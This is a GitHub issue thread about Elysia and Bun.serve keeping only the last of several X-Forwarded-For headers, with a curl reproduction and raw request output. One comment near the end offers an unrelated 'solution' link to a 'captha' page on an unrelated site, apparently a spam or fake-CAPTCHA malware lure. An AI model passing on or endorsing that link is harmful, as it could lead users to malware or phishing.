### ISSUE TITLE
Handling Multiple X-Forwarded-For Headers in Elysia

### ISSUE THREAD

**Issue by vanisoul** [elysiajs/elysia#890]
### What version of Elysia is running?

1.1.23

### What platform is your computer?

Linux 6.8.0-47-generic x86_64 x86_64

### What steps can reproduce the bug?

Description: The Elysia framework's request handling for the X-Forwarded-For header is incorrectly using only the last value when multiple headers are sent. According to the [HTTP specification](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For#parsing), if multiple X-Forwarded-For headers are present, the values should be concatenated, with the addresses from all headers forming a comma-separated list.

Steps to Reproduce:
Use curl to send a POST request with multiple X-Forwarded-For headers:
`curl -X POST -H "X-Forwarded-For: 192.168.1.101, 192.168.2.102" -H "X-Forwarded-For: 192.168.3.103" http://127.0.0.1:3000/`

Code Example:
```
import { Elysia } from "elysia";

const app = new Elysia()
    .onRequest(({ request }) => {
        // request.headers x-forwarded-for only 192.168.3.103
    })
    .get("/", () => "Hello Elysia")
    .listen(3000);

console.log(`🦊 Elysia is running at ${app.server?.hostname}:${app.server?.port}`);
```

Expected Behavior:
- The X-Forwarded-For values should be concatenated into a comma-separated list: 192.168.1.101, 192.168.2.102, 192.168.3.103.

Actual Behavior:
- Only the last X-Forwarded-For header (192.168.3.103) is being considered.

Additional Information:
If you observe the network output using `nc -l 3000`, the raw HTTP request shows that both X-Forwarded-For headers are correctly passed:
```
POST / HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: curl/8.5.0
Accept: */*
X-Forwarded-For: 192.168.1.101, 192.168.2.102
X-Forwarded-For: 192.168.3.103
```

**Comment by sudityashrivastav** [comment]
This is very interesting bug but in production most of the time only one ip address will came in the request.

**Comment by vanisoul** [comment]
That's true, in many cases, only one IP address may appear in production requests. only one IP address will appear in the X-Forwarded-For header. 
However, there could be situations where multiple proxies are involved, such as with environments using something like K3s and Traefik Ingress Controller. 
In those cases, it's possible that multiple X-Forwarded-For headers might be passed along, so concatenating the headers correctly would be necessary.

**Comment by kravetsone** [comment]
> That's true, in many cases, only one IP address may appear in production requests. only one IP address will appear in the X-Forwarded-For header. However, there could be situations where multiple proxies are involved, such as with environments using something like K3s and Traefik Ingress Controller. In those cases, it's possible that multiple X-Forwarded-For headers might be passed along, so concatenating the headers correctly would be necessary.

Can u try it with just `Bun.serve`?

**Comment by vanisoul** [comment]
> > That's true, in many cases, only one IP address may appear in production requests. only one IP address will appear in the X-Forwarded-For header. However, there could be situations where multiple proxies are involved, such as with environments using something like K3s and Traefik Ingress Controller. In those cases, it's possible that multiple X-Forwarded-For headers might be passed along, so concatenating the headers correctly would be necessary.
> 
> Can u try it with just `Bun.serve`?

Thank you for the suggestion! I had actually noticed this issue with Bun.serve earlier and submitted a bug report to the Bun team before your reply. The problem seems to stem from how Bun.serve handles multiple X-Forwarded-For headers—it only keeps the last value, instead of concatenating them into a comma-separated list as per the HTTP specification.

Here’s the issue I submitted to Bun: https://github.com/oven-sh/bun/issues/14782.

**Comment by kravetsone** [comment]
> > > Это правда, во многих случаях в производственных запросах может появляться только один IP-адрес. Только один IP-адрес будет появляться в заголовке X-Forwarded-For. Однако могут быть ситуации, когда задействовано несколько прокси-серверов, например, в средах, использующих что-то вроде K3s и Traefik Ingress Controller. В этих случаях возможно, что может передаваться несколько заголовков X-Forwarded-For, поэтому необходимо правильно объединить заголовки.
> > 
> > 
> > Можете ли вы попробовать просто `Bun.serve`?
> 
> Спасибо за предложение! На самом деле я заметил эту проблему с Bun.serve ранее и отправил отчет об ошибке команде Bun до вашего ответа. Проблема, похоже, связана с тем, как Bun.serve обрабатывает несколько заголовков X-Forwarded-For — он сохраняет только последнее значение, а не объединяет их в список, разделенный запятыми, как указано в спецификации HTTP.
> 
> Вот вопрос, который я отправил Бану: [oven-sh/bun#14782](https://github.com/oven-sh/bun/issues/14782) .

Elysia depends on Bun.serve so this issue likely for Bun

**Comment by sgmustafi** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by SaltyAom** [comment]
Unfortunately, this is blocking on https://github.com/oven-sh/bun/issues/14782
